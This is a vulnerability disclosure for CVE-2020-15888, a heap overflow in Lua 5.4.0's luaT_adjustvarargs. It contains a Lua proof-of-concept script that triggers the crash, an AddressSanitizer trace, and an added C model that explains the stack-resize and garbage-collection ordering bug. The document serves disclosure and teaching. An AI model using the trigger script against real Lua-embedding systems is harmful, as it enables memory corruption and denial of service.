CVE-2020-15888: Heap overflow in luaT_adjustvarargs

Lua through 5.4.0 mishandles the interaction between stack resizes and garbage collection, leading to a heap-based buffer overflow, heap-based buffer over-read, or use-after-free.


Hi,

We found a heap overflow in Lua. Here are the details:

Version:

Lua 5.4.0, git hash c33b1728aeb7dfeec4013562660e07d32697aa6b

POC:

do
  function errfunc(p16, p17, p18, p19, p20, p21, p22, p23, p24, p25, p26, p27,
                   p28, p29, p30, p31, p32, p33, p34, p35, p36, p37, p38, p39,
                   p40, p41, p42, p43, p44, p45, p46, p48, p49, p50, ...)
    a9 'fail'
  end
  coroutine.wrap(function()
    xpcall(test, function()
      do
        setmetatable({}, { __gc = function() if k < 2 then end end })
      end
    end)
    xpcall(test, errfunc)
  end)()
end

How to reproduce:

./lua poc.lua

Stack dump:

=================================================================
==12863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d000001370 at pc 0x000000434ef4 bp 0x7ffeca5e4290 sp 0x7ffeca5e4280
WRITE of size 8 at 0x61d000001370 thread T0
    #0 0x434ef3 in luaT_adjustvarargs (/home/yongheng/lua_asan/lua+0x434ef3)
    #1 0x43a6fa in luaV_execute (/home/yongheng/lua_asan/lua+0x43a6fa)
    #2 0x415194 in luaD_callnoyield (/home/yongheng/lua_asan/lua+0x415194)
    #3 0x4112ae in luaG_errormsg (/home/yongheng/lua_asan/lua+0x4112ae)
    #4 0x411491 in luaG_runerror (/home/yongheng/lua_asan/lua+0x411491)
    #5 0x411595 in luaG_typeerror (/home/yongheng/lua_asan/lua+0x411595)
    #6 0x4138bc in luaD_tryfuncTM (/home/yongheng/lua_asan/lua+0x4138bc)
    #7 0x41480d in luaD_call (/home/yongheng/lua_asan/lua+0x41480d)
    #8 0x43d4cc in luaV_execute (/home/yongheng/lua_asan/lua+0x43d4cc)
    #9 0x415194 in luaD_callnoyield (/home/yongheng/lua_asan/lua+0x415194)
    #10 0x4112ae in luaG_errormsg (/home/yongheng/lua_asan/lua+0x4112ae)
    #11 0x411491 in luaG_runerror (/home/yongheng/lua_asan/lua+0x411491)
    #12 0x411595 in luaG_typeerror (/home/yongheng/lua_asan/lua+0x411595)
    #13 0x4138bc in luaD_tryfuncTM (/home/yongheng/lua_asan/lua+0x4138bc)
    #14 0x41480d in luaD_call (/home/yongheng/lua_asan/lua+0x41480d)
    #15 0x40bfb3 in lua_pcallk (/home/yongheng/lua_asan/lua+0x40bfb3)
    #16 0x45672e in luaB_xpcall (/home/yongheng/lua_asan/lua+0x45672e)
    #17 0x414de1 in luaD_call (/home/yongheng/lua_asan/lua+0x414de1)
    #18 0x43d4cc in luaV_execute (/home/yongheng/lua_asan/lua+0x43d4cc)
    #19 0x4142f2 in unroll (/home/yongheng/lua_asan/lua+0x4142f2)
    #20 0x4127d0 in luaD_rawrunprotected (/home/yongheng/lua_asan/lua+0x4127d0)
    #21 0x4157f2 in lua_resume (/home/yongheng/lua_asan/lua+0x4157f2)
    #22 0x469fa4 in auxresume (/home/yongheng/lua_asan/lua+0x469fa4)
    #23 0x46a4da in luaB_auxwrap (/home/yongheng/lua_asan/lua+0x46a4da)
    #24 0x414de1 in luaD_call (/home/yongheng/lua_asan/lua+0x414de1)

Found by: Yongheng Chen and Rui Zhong

Best,

Yongheng
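The CVE description above frames the bug as an interaction between stack resizes and garbage collection: the vararg adjustment asks for stack space, a collection step that runs while that space is reserved but not yet written can shrink the stack again, and the copies luaT_adjustvarargs then makes land past the allocation (the WRITE of size 8 in the report). The C program below is an added model of that ordering, written for this page; it is not Lua's source. The Stack type, GC_SLACK, the shrink policy in gc_step, the scenario numbers and the "collector first, then grow" ordering in checkstack_gc_fixed are assumptions chosen to make the pattern visible, and the overflow is counted by a bounds check instead of being performed, so the program runs deterministically without AddressSanitizer.

```c
/* Model of an interpreter value stack whose "ensure space" helper interleaves
 * a resize with a garbage-collection step.  Constructed for this page; it is
 * not Lua's code.  An out-of-bounds write is reported by a bounds check rather
 * than performed, so the result is deterministic without a sanitizer. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GC_SLACK 4   /* assumed: the collector keeps a few spare slots when it shrinks */

typedef struct {
    long  *slots;  /* heap buffer holding the values */
    size_t size;   /* allocated slot count */
    size_t top;    /* slots currently in use */
} Stack;

static void stack_resize(Stack *s, size_t newsize) {
    long *p = realloc(s->slots, newsize * sizeof *p);
    if (p == NULL) abort();          /* model only: no recovery path */
    s->slots = p;
    s->size  = newsize;
}

/* The collector shrinks a stack that is mostly unused.  It only sees s->top;
 * it knows nothing about space a caller has reserved but not yet written. */
static void gc_step(Stack *s) {
    size_t inuse = s->top + GC_SLACK;
    if (s->size > 2 * inuse)
        stack_resize(s, inuse);
}

/* Buggy ordering, as the advisory describes it: grow, then run the collector,
 * which may undo the growth before the caller has used the slots. */
static void checkstack_gc_buggy(Stack *s, size_t needed) {
    if (s->size - s->top < needed)
        stack_resize(s, s->top + needed);
    gc_step(s);
}

/* One safe ordering (assumed, not necessarily Lua's exact fix): let the
 * collector shrink first, then grow to the size the caller needs. */
static void checkstack_gc_fixed(Stack *s, size_t needed) {
    gc_step(s);
    if (s->size - s->top < needed)
        stack_resize(s, s->top + needed);
}

/* Copies 'nargs' values up the stack, the way a vararg adjustment moves the
 * function and its fixed parameters to the top.  Returns how many of those
 * writes would have landed past the allocation (0 when every write is safe). */
static size_t move_args(Stack *s, size_t nargs) {
    size_t overflow = 0;
    for (size_t i = 0; i < nargs; i++) {
        if (s->top >= s->size) { overflow++; continue; }  /* would be the heap overflow */
        s->slots[s->top] = s->slots[i];
        s->top++;
    }
    return overflow;
}

/* Builds a stack with 'size' allocated and 'inuse' live slots, asks for
 * 'needed' more through the chosen helper, then moves 'needed' values.
 * Returns the number of out-of-bounds writes the move would have made. */
static size_t run_scenario(int fixed, size_t size, size_t inuse, size_t needed) {
    Stack s = {0};
    stack_resize(&s, size);
    memset(s.slots, 0, size * sizeof *s.slots);
    s.top = inuse;
    if (fixed) checkstack_gc_fixed(&s, needed);
    else       checkstack_gc_buggy(&s, needed);
    size_t overflow = move_args(&s, needed);
    free(s.slots);
    return overflow;
}

int main(void) {
    printf("buggy ordering: %zu writes past the allocation\n", run_scenario(0, 16, 5, 40));
    printf("fixed ordering: %zu writes past the allocation\n", run_scenario(1, 16, 5, 40));
    return 0;
}
```

With 16 allocated slots, 5 live and 40 requested, the buggy helper grows to 45, the collector shrinks back to 9, and 36 of the 40 copies fall outside the buffer; running the collector before growing keeps all 40 in bounds. The audit rule this illustrates for any interpreter or VM: a helper that "ensures N slots" must not call into anything that can reallocate or shrink the buffer between the capacity check and the writes that rely on it, or it must re-derive every saved pointer and the remaining capacity afterwards.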
